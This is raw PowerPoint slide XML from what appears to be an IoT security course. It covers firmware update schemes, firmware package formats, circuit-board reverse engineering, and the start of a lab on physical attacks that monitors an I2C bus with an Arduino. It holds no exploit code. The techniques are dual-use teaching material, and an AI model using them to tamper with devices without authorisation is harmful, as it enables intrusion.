            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1731231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426720" y="1420586"/>
            <a:ext cx="11582400" cy="5082546"/>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Active and passive copy of the OS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Idea: The OS exists in two copies, only one copy is active, the other can be safely modified</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Advantages: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If an update fails, rollback possible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In case of corruptions of the active copy, the device can switch to the passive copy</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How to identify</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Existence of multiple partitions with the same content, sometimes marked as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SystemA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SystemB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Bootloader (u-Boot) with flags in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>cmdline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> for different partitions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Firmware formats: full Ext2/Ext3/Ext4/JFFS2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Squashfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> filesystems; bare-metal OS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Process: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The firmware is written to a temporary partition or to the passive copy directly</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If successful, the device reboots in updated copy (former passive, now active)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The device updates the former active copy</a:t>
            </a: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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90020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141166" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understanding circuit boards</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Reverse engineering circuit boards is an art.  You’ll need a good imaging system.</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First, look at the components and consult the datasheets for them.  </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Take pictures of it.  Sometimes the schematics are online.  Using a meter helps identify connectivity.</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See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https://www.instructables.com/id/How-to-reverse-engineer-a-schematic-from-a-circuit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for methods to manually get a schematic from a board.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Finally, make sure the schematic you extract “makes sense.”</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Boards can radiate (and receive) signals in the GHZ frequency range because of the distance between the traces.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F3818A0-EC65-FD46-9A8C-FC51659049D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7580671" y="15436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6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7F67325-170C-8240-85E7-5A2B9FF3CFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3778956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234559" y="1607130"/>
            <a:ext cx="11732996" cy="4846205"/>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Fixed OS, updated application firmware</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Idea: The OS itself stays the same, only the application part is updated</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Advantage: Requires less space on flash than full active and passive OS partition, cheaper for the vendor</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Disadvantage: Bugs and Vulnerabilities in OS part cannot be corrected easily</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How to identify:</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Only one OS partition exists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Multiple app partitions are existing, sometimes marked as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>AppA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>AppB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Firmware formats: full Ext2/Ext3/Ext4 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Squashfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> filesystems with only a few binary files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Procedure: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OS shuts down application</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The firmware is written to a “passive” application partition, then updates the “active” partition</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OS restarts application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3116284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426720" y="1731325"/>
            <a:ext cx="11582400" cy="4951918"/>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Differential changes to one copy of the OS</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Idea: The partitions are not changed, only required contents are updated</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Advantage:</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Smaller firmware update files, Smaller required partitions, less writes to Flash</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Disadvantage:</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Fallback more difficult, if possible at all</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How to spot:</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Only one OS partition is existing, must be Ext2/Ext3/Ext4</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Firmware formats: tar.gz, APK, deb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Process:</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OS shuts down application</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Applies changes to the filesystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OS restarts application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1386536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371300" y="1478979"/>
            <a:ext cx="11582400" cy="4663440"/>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Firmware package formats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Many different variations</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Tools used to write data to partitions: dd, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>nandwrite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Outer layer: device specific format to identify a valid firmware package</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Header with “Magic”, checksums, signatures, version information</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Encryption, e.g. AES or some custom method</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Compression, e.g. LZMA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Inner layer: the actual payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Baremetal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> OS </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Ext2/Ext3/Ext4/JFFS2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SquashFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> filesystems as raw images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Kernels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Applications in “.deb” or “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>” format</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Installation scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Other archives: tar.gz, tar.bz, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>cpio</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2715036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Map firmware update process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1839692"/>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Firmware package formats (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>and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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>for frameworks), formats include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Arj,  Arcadyan firmware obfuscation, Hilink encrypted firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cpio, gzip, jar, tar, rar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ROMFS, JFFS2 file format, zlib, LZMA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>http://w00tsec.blogspot.com/2013/11/unpacking-firmware-images-from-cable.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>HPACK, JAM, LHARC/LHA, HP Printer Job Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>deb, rpm, Microsoft Cabinet files, InstallShield Cabinet files, Windows CE package files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>BSA archives, XAR archiver, Borg backup-archive </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ways to get and initiate updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092C3950-68E0-914F-BED3-96BC53D90DBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442817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33037"/>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Reverse engineering, part 4, implement IoT based attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523076" y="3141406"/>
            <a:ext cx="11112910" cy="1455057"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lab exercises – simple physical attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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AB705DA-A34E-9946-88A0-8A9F5121EA73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296094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30882"/>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Monitor an I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" baseline="30000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C bus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2092036"/>
            <a:ext cx="11582400" cy="441109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Use Arduino I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>C monitor in electronics section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Connect Arduino pins to I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>C bus (see I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>C connections in the Electronics section).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
